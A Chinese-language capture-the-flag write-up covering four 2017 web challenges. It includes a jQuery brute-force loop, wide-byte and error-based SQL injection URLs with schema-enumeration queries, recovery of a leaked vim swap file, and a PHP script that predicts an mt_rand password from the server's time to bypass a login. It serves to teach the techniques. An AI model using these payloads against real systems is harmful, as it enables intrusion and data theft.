某CTF 2017

admin 2022年5月17日11:30:58评论53 views字数 2452阅读8分10秒阅读模式

WEB 抽奖呗

源碼大法

view-source:http://xxx/

可疑文件

http://xxx/js/jQuery.js

AAENCODE & decode

aadecode - Decode - Online

解碼后發現關鍵函數 getFlag()

Get Flag

直接在控制台查看函數

window.getFlag

flag{951c712ac2c3e57053c43d80c0a9e543}

WEB 继续抽

源碼大法

view-source:http://xxx:81/

Payload

看了下源碼,爆破

function orz(t) {
    $.get('token.php',
    function(token) {
        console.log(token);
        $.get("get.php?token=" + token + "&id=" + encode(md5(t)),
        function(jsctf3) {
            console.log(jsctf3);
            if(jsctf3['text'].indexOf('flag{')>-1){
                alert(jsctf3['text']);
            }else if(t<200){
                orz(t+1);
            }
        },
        'json');
    },'json');
}
orz(0);

Get Flag

flag{b81cfec0285f75d4e36d2ccb2f7ec2c0}

Web just a test

簡單測試下就知道是字符集導致注入&報錯注入

  • 爆表
  • select table_name from information_schema.tables limit %s,1
  • 爆庫
  • select table_schema from information_schema.tables limit %s,1
  • 爆字段
  • select column_name from information_schema.columns where table_name in (0x666c4067) limit %s,1
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,32,20) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,1,32) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"

萬能的sqlmap其實也能跑出來

Get Flag

flag{99cd1872c9b26525a8e5ec878d230caf}

WEB Wrong

我就不吐槽出題人的智商了。

get file

洩露文件:http://xxx:85/.index.php.swp

下載,查看,恢復vim -r xxx.php

hack it

用時間戳做種子,考慮的本地時間和服務器時間不同,所以獲取服務器時間,strtotime()轉化成時間戳。

跑出pwd,

session_id繞過$_SESSION['userLogin']==$_GET['login']

Get Flag

flag{rand_afjk_u8nm_uq2n}

Poc

閒著沒事寫寫,以後可能用到

<?php
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}

function get_headers_from_curl_response($headerContent)
{
    $headers = array();
    $arrRequests = explode("\r\n\r\n", $headerContent);
    for ($index = 0; $index < count($arrRequests) -1; $index++) {
        foreach (explode("\r\n", $arrRequests[$index]) as $i => $line)
        {
            if ($i === 0)
                $headers[$index]['http_code'] = $line;
            else
            {
                list ($key, $value) = explode(': ', $line);
                $headers[$index][$key] = $value;
            }
        }
    }
    return $headers;
}

function curl_get($url,$param,$d=False){
    $ch = curl_init();  
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    if ($d){
        $header = get_headers_from_curl_response(substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)));
        $res = $header[0]['Date'];
    }
    curl_close($ch);
    return $res;
}

$url = "http://117.34.111.15:85/";
$seed = curl_get($url,"",True);
mt_srand(strtotime($seed));
$pwd=urlencode(create_password());
echo curl_get($url."index.php?pwd=$pwd&login=","");

End

..............

FROM : virzz.com | Author:Virink

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日11:30:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某CTF 2017https://cn-sec.com/archives/1012975.html

发表评论

匿名网友 填写信息